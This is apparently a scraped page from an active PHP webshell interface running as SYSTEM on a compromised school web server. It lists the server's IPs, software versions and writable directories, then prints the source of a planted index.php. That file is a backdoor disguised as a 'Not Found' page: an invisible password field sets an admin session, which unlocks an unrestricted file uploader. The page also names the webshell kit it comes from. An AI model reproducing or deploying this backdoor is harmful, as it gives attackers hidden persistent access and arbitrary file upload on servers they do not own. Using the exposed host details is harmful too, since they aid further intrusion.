403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/myschool/watdontoom/usericon/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : E:/Inetpub/www/myschool/watdontoom/usericon/index.php
<?php
session_start();

if($_SESSION["adm"]){
echo '<b>Namesis<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>';
 }	else { echo '<b>Upload Fail !!!</b><br><br>';
 }}
}
if($_POST["p"]){
$p = $_POST["p"];

$pa = sha1(md5($p));
if($pa=="90b9aa7e25f80cf4f64e990b78a9fc5ebd6cecad"){
$_SESSION["adm"] = 1;

}
}
?>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at  port 80 
</ADDRESS>
	<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
		<input style="border:0;background:transparent;position:absolute;bottom:0;right:0;" type="password" name="p" required />
	</form>

Youez - 2016 - github.com/yon3zu
LinuXploit